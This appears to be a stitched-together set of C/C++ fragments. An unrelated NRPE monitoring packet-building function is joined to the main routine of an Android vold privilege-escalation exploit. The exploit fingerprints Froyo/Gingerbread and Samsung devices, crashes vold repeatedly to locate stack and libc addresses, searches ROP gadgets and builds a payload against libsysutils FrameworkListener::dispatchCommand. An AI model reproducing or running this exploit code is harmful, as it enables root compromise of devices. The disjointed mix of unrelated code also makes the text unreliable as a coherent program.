const char* create_buffer() { delete [] tmpBuffer; unsigned int packet_length = nrpe::length::get_packet_length(payload_length_); tmpBuffer = new char[packet_length+1]; memset(tmpBuffer, 0, packet_length+1); nrpe::data::packet *p = reinterpret_cast<nrpe::data::packet*>(tmpBuffer); p->result_code = swap_bytes::hton<int16_t>(result_); p->packet_type = swap_bytes::hton<int16_t>(type_); p->packet_version = swap_bytes::hton<int16_t>(version_); if (payload_.length() >= payload_length_) throw nrpe::nrpe_exception("To much data cant create return packet (truncate data)"); update_payload(p, payload_); p->crc32_value = 0; crc32_ = p->crc32_value = swap_bytes::hton<u_int32_t>(calculate_crc32(tmpBuffer, packet_length)); return tmpBuffer; }
int main(int argc, char **argv, char **env) { uint32_t i = 0, ok = 0; struct stat st; char version_release[1024]; int tries=0; int payload_size=0; stat(vold, &st); heap_base_addr = ((((st.st_size) + 0x8000) / 0x1000) + 1) * 0x1000; __system_property_get("ro.build.version.release", version_release); if (strstr(version_release, "2.2")) { heap_offset = 0x108; printf("[+] Found a Froyo ! 0x%08x\n", heap_offset); } else if (strstr(version_release, "2.3")) { heap_offset = 0x118; printf("[+] Found a GingerBread ! 0x%08x\n", heap_offset); } else { printf("[-] Not a 2.2/2.3 Android ...\n"); exit(-1); } heap_addr = 0xffffff; __system_property_get("ro.build.fingerprint", version_release); if(!strncmp(version_release, "samsung", 7)) { printf("[+] Found a Samsung, running Samsung mode\n"); samsung = 1; } system_ptr = (uint32_t) find_symbol("system"); libc_base = system_ptr & 0xfff00000; if (check_addr(system_ptr) == -1) { printf("[-] system_ptr contains forbidden bytes!\n"); exit(-1); } tries = 0; printf("[*] Step 1: causing the first vold crash...\n"); while(buffsz=allbuffsz[tries]) { if(checkcrash()) { printf("[+] Vold crashed using %d arguments!\n", buffsz); break; } tries++; } if(!buffsz) { printf("[-] Unable to crash vold process. Fixed vold???\n"); exit(-1); } for (tries = 0; tries < 2; tries++) { heap_oracle(); printf("\n[*] Step 2: causing the second vold crash\n"); find_stack_addr(); if (stack_addr != 0x41414141 && jumpsz) { printf("[+] stack_addr found: 0x%08x, padding: 0x%04x\n", stack_addr, jumpsz); break; } } if (stack_addr == 0x41414141 || !jumpsz) { printf("[-] Unable to generate stack_addr!\n\n"); exit(-1); } if (check_addr(stack_addr) == -1) { if(bad_byte(stack_addr & 0xff)) { stack_addr += 4; adjust = 4; if (check_addr(stack_addr) == -1) { printf("[-] stack_addr contains forbidden bytes!\n"); exit(-1); } } else { printf("[-] stack_addr contains forbidden bytes!\n"); exit(-1); } } if (jumpsz > 108 + 12) { printf("[-] Too much padding is needed!\n"); exit(-1); } if(check_libc_base()) { system_ptr = libc_base + (system_ptr & 0x000fffff); printf("[*] Pointer to system function found at 0x%08x ...\n", system_ptr); if (check_addr(system_ptr) == -1) { printf("[-] Pointer to system function contains forbidden bytes!\n"); exit(-1); } } kill(logcat_pid, SIGKILL); unlink(crashlog); printf("\n[*] Researching ROP gadgets ...\n"); find_rop_gadgets(); printf("[+] first gadget found at 0x%08x, second gadget found at 0x%08x\n", stack_pivot, pop_r0); payload_size = update_payload(); printf("\n[*] Payload generated: %d bytes\n", payload_size); print_payload(payload_size); return 0; }
// Exploit libsysutils FrameworkListener::dispatchCommand method int do_fault() { return send_payload(update_payload()); }